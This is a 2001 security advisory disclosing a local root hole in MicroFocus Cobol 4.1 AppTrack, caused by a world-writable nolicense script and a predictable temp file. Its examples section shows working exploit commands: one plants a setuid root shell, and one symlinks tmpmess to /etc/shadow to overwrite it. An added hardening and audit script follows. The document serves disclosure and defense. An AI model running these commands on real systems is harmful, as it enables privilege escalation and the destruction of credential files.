Security Hole in Microfocus Cobol

2001-02-13T00:00:00
ID SECURITYVULNS:DOC:1283
Type securityvulns
Reporter Securityvulns
Modified 2001-02-13T00:00:00

Description

Summary

If the AppTrack feature is enabled, the default install of MicroFocus Cobol 4.1 (Merant's commercial suite of COBOL utilities) contains a security hole which can lead to root compromise.

Specifics

In the default install, /var/mfaslmf is installed mode 777, and /var/mfaslmf/nolicense is installed mode 666. nolicense also contains the following:

    # Append into a logfile
    if test ! -f /var/mfaslmf/USERLOG
    then
        touch /var/mfaslmf/USERLOG
        chmod 666 /var/mfaslmf/USERLOG
    fi
    echo `date`:No license $* >> /var/mfaslmf/USERLOG

    # mail a specified user (commented out by default. substitute the user
    # name)
    # echo `date`:No license $* > /var/mfaslmf/tmpmess
    # mail -s "No AS license" user-name < /var/mfaslmf/tmpmess
    # rm /var/mfaslmf/tmpmess

This presents two major types of problem:

  • Because of the permissions on nolicense, unprivileged users can edit the file to insert arbitrary commands into the script. Then, if AppTrack is enabled (see below) and the trigger condition occurs (again, see below), that code can be executed with superuser privileges.

  • The use of predictably-named temporary files in a world-writeable directory can allow local users to append, overwrite or destroy arbitrary files, even if nolicense itself is made non-world-writeable.

Examples

Of the first problem:

    $ id
    uid=500(echo8) gid=10(users)
    $ cat >> /var/mfaslmf/nolicense
    /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
    ^D

Create a condition under which all available AS licenses are used up. This should not be difficult. When this occurs, /var/mfaslmf/nolicense will run.

    $ ls -alt /tmp/ksh
    -rwsr-xr-x   1 root     other     186356 Dec 26 17:04 /tmp/ksh
    $ /tmp/ksh
    # id
    uid=500(echo8) gid=10(users) euid=0(root)

Of the second:

    $ id
    uid=500(echo8) gid=10(users)
    $ cd /var/mfaslmf
    $ ln -s /etc/shadow tmpmess

Again, create a condition under which nolicense will run. This example will overwrite /etc/shadow.

    $ cat /etc/shadow      (would need to be done as root, but you get the point...)
    Tue Dec 26 17:08:45 EST 2000:No license
    $

Conditions

These holes can only be exploited if the AppTrack functionality is enabled. This feature is off by default.

Vulnerable Versions

4.1 for Solaris/sparc - only version tested.

Workarounds

Change the permissions on /var/mfaslmf and rewrite nolicense. According to the documentation, nolicense is provided as "an example" and the user "can edit the nolicense script to your requirements." IMO, example code with serious security holes should NOT be distributed. If you don't need this feature, delete the script. Regardless of whether or not you need AppTrack to work, you should be able to change the permissions on /var/mfaslmf to something safer.
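The following is an added example, not part of the original advisory and not vendor code: a small audit-and-harden script for the workaround above. It checks an AppTrack license directory for the two weaknesses the advisory describes (world-writable directory and files, and a mail body staged in the predictably named tmpmess file), then applies the fix: a root-owned, non-world-writable directory and a rewritten nolicense that pipes the message straight into mail instead of writing a temp file. The function names (audit_mfaslmf, uses_predictable_tmpfile, write_hardened_nolicense, harden_mfaslmf, setup_vulnerable_copy) are hypothetical, and the directory path is a parameter so the functions can be exercised against a constructed copy of the layout rather than a real /var/mfaslmf.

```shell
#!/bin/sh
# Added example, not part of the original advisory or of the vendor's
# product: audit an AppTrack license directory for the two weaknesses
# the advisory describes, then apply the workaround. Paths are
# parameters so the functions can run against a constructed copy.

# Print every world-writable file or directory under $1.
# Returns 1 if any were found, 0 if the tree is clean.
audit_mfaslmf() {
    bad=$(find "$1" -perm -002 2>/dev/null)
    if [ -n "$bad" ]; then
        printf '%s\n' "$bad" | sed 's/^/world-writable: /'
        return 1
    fi
    return 0
}

# Returns 1 if the script at $1 still stages its mail body in the
# predictably named tmpmess file (the symlink target in the advisory).
uses_predictable_tmpfile() {
    if grep -q 'tmpmess' "$1"; then
        return 1
    fi
    return 0
}

# Write a replacement nolicense into $1 that keeps the logging behaviour
# but never creates a temp file: the message is piped straight into mail.
# "user-name" is the placeholder the vendor's script uses.
write_hardened_nolicense() {
    cat > "$1/nolicense" <<'EOF'
#!/bin/sh
# Append into the log file; the administrator creates USERLOG with
# mode 644 once, so this script never has to touch or chmod it.
echo "`date`:No license $*" >> /var/mfaslmf/USERLOG
# Mail a specified user (commented out by default; substitute the user
# name). No temp file is written, so there is nothing to symlink.
# echo "`date`:No license $*" | mail -s "No AS license" user-name
EOF
}

# Apply the workaround: directory, script and log writable only by the
# owner. chown needs root, so it is attempted only when running as root.
harden_mfaslmf() {
    dir=$1
    write_hardened_nolicense "$dir"
    chmod 755 "$dir"
    chmod 744 "$dir/nolicense"
    [ -f "$dir/USERLOG" ] || : > "$dir/USERLOG"
    chmod 644 "$dir/USERLOG"
    if [ "$(id -u)" -eq 0 ]; then
        chown -R root "$dir"
    fi
}

# Build a constructed copy of the layout the advisory describes (mode 777
# directory, mode 666 nolicense and USERLOG) under a temp directory and
# print its path. This is a test fixture, not a real install.
setup_vulnerable_copy() {
    d=$(mktemp -d)
    cat > "$d/nolicense" <<'EOF'
#!/bin/sh
echo `date`:No license $* > /var/mfaslmf/tmpmess
EOF
    : > "$d/USERLOG"
    chmod 777 "$d"
    chmod 666 "$d/nolicense" "$d/USERLOG"
    printf '%s\n' "$d"
}

# Usage: sh audit_mfaslmf.sh /var/mfaslmf   (audit only, changes nothing)
if [ $# -eq 1 ]; then
    audit_mfaslmf "$1" && echo "no world-writable entries under $1"
    uses_predictable_tmpfile "$1/nolicense" || echo "nolicense still uses tmpmess"
fi
```

Run the audit first on a production system and review what it reports before calling harden_mfaslmf as root; the hardened nolicense assumes USERLOG already exists with mode 644, which is exactly what the original script's touch/chmod 666 dance was working around by making the file world-writable.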

Vendor Notification

The vendor was notified on 12/26/2000.

Send comments to echo8@gh0st.net